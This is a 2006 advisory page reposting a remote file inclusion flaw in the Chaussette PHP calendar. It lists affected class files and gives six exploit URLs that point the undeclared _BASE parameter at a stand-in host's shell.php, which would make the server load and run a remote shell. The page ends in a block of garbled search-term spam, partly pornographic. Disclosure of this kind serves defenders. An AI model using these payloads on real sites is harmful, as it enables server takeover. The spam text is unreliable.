about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities



2006-08-10 Chaussette <= 080706 (_BASE) Remote File Include Vulnerabilities
Rated as : High Risk

Chaussette Remote File Inclusion

CreW: ToXiC
Bug Found By Drago84

Source Code:
http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip

Page Affect
/Classes/Evenement.php
/Classes/Event.php
/Classes/Event_for_month.php
/Classes/Event_for_month_per_day.php
/Classes/Event_for_week.php
/Classes/My_Log.php
/Classes/My_Smarty.php

Problem Is :
$_BASE Not Declare;


ExP:
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Log.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/My_Smarty.php?_BASE=http://www.evalsite.com/shell.php

Greatz: Str0ke
securitydot.net - 2006-08-10

Advertising

Copyright 2007, SecurityDot
Fri, 29 Aug 2008 01:37:11 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Chicas des Madhuriboo Instant Crack Data www.iran+t PHP+Advanc software d passenger. 200 /compo Chicas des news for c photo girl www.fuck-g /Dolphin-v sexi vedeo www.freepo free xxx g www.Worled Power Boar free xxx g ANIMALSAX www.pelicu eva loreng t100t news for c shopmailpw t323t IceWarp We news searc 200 /compo Vidio porn bollywood tamil actr news for C bignatural Www.Tamilc www.lalats www.sexgay news for c t422t PERLIHATKA arabia sex linux vi t836t news for C ww.89.com www.erotic RFI Vulner wweesx com_facile